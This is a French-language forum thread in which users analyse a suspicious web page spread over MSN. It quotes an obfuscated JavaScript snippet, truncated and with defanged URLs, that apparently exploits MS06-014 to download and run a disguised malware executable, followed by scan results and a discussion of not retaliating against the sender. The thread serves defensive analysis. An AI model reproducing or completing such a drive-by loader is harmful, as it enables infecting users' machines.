[BuRner]

Voila en fait depuis 2 semaines à peu près, plusieurs de mes contacts n'arrètent pas de m'envoyer une URL contenant une page avec un javascript "suspect" mais je sais pas exactement ce qu'il fait...

Le problème c'est que j'ai ouvert plusieurs fois la page et j'aimerais savoir s'il y a des risques que j'ai été infecté? Ou bien si ce javascript ne fonctionne que pour certains navigateurs etc... ?

Quelqu'un sait-il m'en dire plus ?
Pour info, je tourne sous Vista  avec Opera.

Voici le liens : hxxp://www.reidemido.c.la

[akhenathon]

aucun risque

c'est le genre de script qu'utilise xiti ou google analytics pour faire des sondages mais en plus simple

[BuRner]

Non je parle de celui à cette adresse-ci : hxxp://membres.lycos.fr/reidemido/index.html

Ceci plus exactement :

Code:

<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="hxxp://membres.lycos.fr/reidemido/30.exe";
var file="erour anti verus.exe";
dc(sc(60,115,99,114,105,114,122,1049,109,1105,97,110,61 ... ,34) + exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,1121,123,118,97,114,32,97,100,11114,101 ... 2));
</script>

[_o_]

Dans ces cas là, il vaut mieux censurer les url pour éviter qu'un malheureux sans tête clique dessus sans faire attention. En l'occurrence, on peut dépiauter le truc, ce n'est pas plus compliqué qu'une petite épreuve de javascript. Et ça permet de constater qu'on est en présence, semble-t-il, d'un exploit de MS06-14 (c'est pas récent, hein) :

http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
http://www.frsirt.com/bulletins/4674
http://www.datastronghold.com/security-articles/general-security-articles/ms-internet-explorer-remote-code-execution-exploit-ms06-014.html

En l'occurrence, il semble télécharger et exécuter l'exécutable dont l'url apparait dans le code en le faisant passer pour un anti-virus. Dommage, je n'ai pas le temps de regarder l'exécutable, mais je me le garde dans un coin. En fait, j'ai trouvé un petit service de scan d'exécutables en ligne (http://virusscan.jotti.org/) et voilà son verdict (je ne mentionne que les outils qui ont détecté quelque chose) :

Status:  INFECTED/MALWARE
 AntiVir: Found HEUR/Crypted
 BitDefender : Found DeepScan:Generic.Malware.SLPV!PkWkg.4ECEFBD9
 ClamAV : Found PUA.Packed.Themida
 CPsecure : Found Packed.W32.Themida.x.a

Bref, un malware, quoi.

[BuRner]

Pour ceux qui ont envie de s'amuser, l'adresse MSN de la personne qui a fait la page et qui diffuse le liens : Modération : rien du tout

[_o_]

Pour ceux qui ont envie de s'amuser, l'adresse MSN de la personne qui a fait la page et qui diffuse le liens : Modération : rien du tout

Il y a une petite différence entre analyser une petite attaque et balancer l'origine supposée pour "se venger". D'abord et avant tout parce que l'on bascule dans l'illégalité complète (je ne me prononcerai pas sur la légalité de l'analyse, d'ailleurs, dans le contexte politique actuel).

D'autre part, tous les renseignements sont à prendre avec des pincettes. Qui te dit que le type en question ne s'est pas fait braquer son compte ? Ou qu'il n'y est pour rien, juste que sa machine est vérolée (ce que je pense) et qu'elle propage l'attaque à son insu ?

[Folcan]

+1, la plus part des attaques dans ce genre provienne d'un post vérolé.

Mes deux voisines, 9 ans chacune, m'ont aussi envoyé par msn le meme type de lien, et je doute fort que ce soit elles qui se soient amusé à compiler un malware et genere une page comme celle la.

[BuRner]

Il y a une petite différence entre analyser une petite attaque et balancer l'origine supposée pour "se venger". D'abord et avant tout parce que l'on bascule dans l'illégalité complète (je ne me prononcerai pas sur la légalité de l'analyse, d'ailleurs, dans le contexte politique actuel).

D'autre part, tous les renseignements sont à prendre avec des pincettes. Qui te dit que le type en question ne s'est pas fait braquer son compte ? Ou qu'il n'y est pour rien, juste que sa machine est vérolée (ce que je pense) et qu'elle propage l'attaque à son insu ?

Ouais je savais que ça allait susciter réaction :p

Juste pour dire que je suis certains que c'est lui et que j'ai pas fait ça pour me venger, puisque j'ai rien eu... Je l'ai fait pour le principe mais je comprend qu'on cache son adresse.

Mais bon cette petite histoire m'aura permis d'en apprendre d'avantage